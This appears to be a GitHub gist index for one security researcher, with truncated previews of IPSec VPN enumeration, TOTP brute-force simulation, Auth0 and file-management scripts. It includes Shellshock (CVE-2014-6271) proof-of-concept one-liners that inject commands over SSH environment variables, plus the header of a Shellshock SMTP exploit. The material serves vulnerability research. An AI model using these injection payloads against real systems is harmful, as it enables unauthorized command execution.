claudijd
/ harvest.rb
Last active
March 27, 2023 16:48
IKE-Scan Mode/TransformSet/VID Enumeration Helper
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # An quick and dirty ike-scan wrapper to enumerate | |
| # supported transform sets and vendor ID fingerprints | |
| # on IPSec VPN Endpoints. | |
| # | |
| # Example Targeted Run Output | |
| # | |
| #$ rvmsudo ruby harvest.rb --targets 192.168.1.1 --enc-types 5 --hash-types 2 --dh-types 2 --auth-types 1 | |
| #I, [2013-08-12T23:53:14.490138 #27197] INFO -- : 5 transform combinations to try | |
| #D, [2013-08-12T23:53:14.490221 #27197] DEBUG -- : Trying ike-scan --multiline 192.168.1.1 | |
| #I, [2013-08-12T23:53:14.726363 #27197] INFO -- : Found a new VID VID=5b362bc820f60001 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ worm parse 01000000020d03632733cadb4398deff53e35fd7255296df9f5a8b8099c701d18fe4328d89351a1da6913276ad8f806f254e13816209e05d68fba914f7a74afa732a0abc56c4a50105aeb171934c5b3336db4ca2ff1dec200798ab0fc554520f2b12a7822684568d8a0de8a5115ae00476aad2607f29e30a559429f66f331d30e281b4f30ad7e799970106aab251c07774ad4d1d2dc4b3657e2b91d43dd41e54b4164dea9b025515d537334d68899e00ef494d54bc3cd6948655b61a8eec1bceebf907e2ab18c0ece009ac01077607cf7e024f2525071b4ecef46060ee23fb1d3ea5e5ed7ea00f44676391719466c071e2facfa35aa364b9c3aba5beb5c1f80b28b38aaef5e9d0f64cc81e2b4f0109ab9995885cb1603ea880323d22ce17752c05f5fb9b0631d1f48552e53f3afa9d3b8097faec35e907be7637543b59db2869bebcf2cda1151f4bf8c2a342e0fd24010a5fc9061809cf2ff11d4d50d3e9d55a0168d6ca4520802d81e5e5fb83af3dbbff297fe42b2e2a2678cbcfc049a99554859ef5046886c6bcb56f2705c44ea7f22c010b6c4e79c796094ec80b096bb495e54d21852a6194d4c35903e25705b97cecdd622cc1e7b4e9a9556a04ef3b255426703e3bc885873e64b0b8fa193f9fd8370c74010c70d7c1940647960e88fb5fe891012567d22394ae99c3beccc9a49b10e70223353e876d510 |
claudijd
/ gist:a195974a11e2ba896964
Created
September 26, 2014 19:05
Alternative Post-Auth SSH PoCs for Shellshock Vulnerability (CVE-2014-6271)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Almost Original SSH PoC for CVE-2014-6271 (Ref: http://seclists.org/oss-sec/2014/q3/651) | |
| ssh claudijd@192.168.10.105 '() { ignored; }; /usr/bin/id' | |
| Note: this pollutes the SSH_ORIGINAL_COMMAND env variable, but what about vars we can set? | |
| # Alterative SSH PoC Injection Points for CVE-2014-6271 | |
| LANG='() { ignored; }; /usr/bin/id' ssh claudijd@192.168.10.105 | |
| LC_NUMERIC='() { ignored; }; /usr/bin/id' ssh claudijd@192.168.10.105 |
claudijd
/ example5.rb
Created
June 28, 2013 14:40
Ruby OpenSSL using verify peer and system cert store.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| >> require 'socket' | |
| => true | |
| >> require 'openssl' | |
| => true | |
| >> | |
| ?> ssl_context = OpenSSL::SSL::SSLContext.new | |
| => #<OpenSSL::SSL::SSLContext:0x007ffc9a9deb00> | |
| >> ssl_context.verify_mode = OpenSSL::SSL::VERIFY_PEER | |
| => 1 | |
| >> cert_store = OpenSSL::X509::Store.new |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import requests | |
| import pdb | |
| import os | |
| BASE_URL = "https://auth.mozilla.auth0.com" | |
| def get_bearer_token(): | |
| url = BASE_URL + '/oauth/token' |
claudijd
/ totp_bruteforce_simulator.rb
Last active
August 23, 2021 12:17
TOTP Bruteforce Simulation Code ("How practical is TOTP bruteforcing?")
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A proof of concept to demonstrate TOTP bruteforcing concepts | |
| # Parameters to control simulation behavior### | |
| request_rate = 4 | |
| totp_validity_window = 90 #in seconds | |
| totp_guesses_per_auth_session = request_rate * totp_validity_window # number of totp guesses per auth session | |
| simulated_logins = 100 # number of simulated logins to help determine average rate of TOTP collision | |
| ############################################## | |
| # Helper Methods |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/python | |
| # Exploit Title: Shellshock SMTP Exploit | |
| # Date: 10/3/2014 | |
| # Exploit Author: fattymcwopr | |
| # Vendor Homepage: gnu.org | |
| # Software Link: http://ftp.gnu.org/gnu/bash/ | |
| # Version: 4.2.x < 4.2.48 | |
| # Tested on: Debian 7 (postfix smtp server w/procmail) | |
| # CVE : 2014-6271 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| log = open("/Users/jclaudius/.aws/config", "r") | |
| for line in log: | |
| print(line) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import glob | |
| import os | |
| import os.path | |
| import shutil | |
| mydir = "/Users/jclaudius/Downloads/" | |
| filelist = glob.glob(os.path.join(mydir, "*")) | |
| for f in filelist: | |
| if os.path.isdir(f): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import shutil | |
| path = "/Users/jclaudius/Desktop/" | |
| moveto = "/Users/jclaudius/Desktop/Archive/" | |
| files = os.listdir(path) | |
| files.sort() | |
| for f in files: | |
| if not os.path.isdir(f): | |
| src = path+f |
NewerOlder